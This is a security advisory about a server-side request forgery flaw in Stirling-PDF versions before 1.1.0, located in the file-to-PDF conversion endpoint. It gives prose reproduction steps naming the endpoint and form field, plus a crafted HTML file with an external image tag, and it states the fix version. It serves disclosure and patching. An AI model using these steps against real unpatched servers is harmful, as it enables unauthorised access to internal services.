Stirling-PDF Server-Side Request Forgery Vulnerability in File Conversion Endpoint

A server-side request forgery (SSRF) vulnerability has been identified in Stirling-PDF versions prior to 1.1.0. The issue arises in the 'convert file to pdf' functionality, which utilizes LibreOffice's unoconvert tool for file conversion. During this process, the application does not properly validate URLs, allowing for potential exploitation.

Impact

Exploitation of this vulnerability allows for server-side request forgery, where an attacker can manipulate the server to make requests on their behalf. This could lead to unauthorized access to internal services or resources.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/v1/convert/file/pdf' endpoint with a file that includes an image tag pointing to an external server. The request must be multipart/form-data format, with the 'fileInput' field containing the crafted HTML file. The server will process the request, and the unoconvert tool will be used for the conversion, during which the SSRF vulnerability can be exploited.

Remediation

Users can update to Stirling-PDF version 1.1.0 or later, where this vulnerability has been patched.